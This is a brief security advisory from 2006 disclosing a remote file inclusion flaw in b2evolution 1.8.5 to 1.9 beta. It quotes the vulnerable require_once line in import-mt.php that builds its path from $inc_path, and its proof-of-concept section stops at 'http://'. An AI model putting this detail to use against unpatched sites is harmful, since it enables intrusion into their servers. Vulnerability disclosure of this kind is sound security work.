|
_________________________________________
_________________________________________
Severity: High
Title: b2evolution Remote File inclusion Vulnerability
Date: 28.11.06
Author: tarkus (tarkus (at) tiifp (dot) org)
Web: https://tiifp.org/tarkus
Vendor: b2evolution (http://b2evolution.net/)
Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Description:
------------
Line 67 of import-mt.php (blogs/inc/CONTROL/imports):
>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>
PoC:
----
http://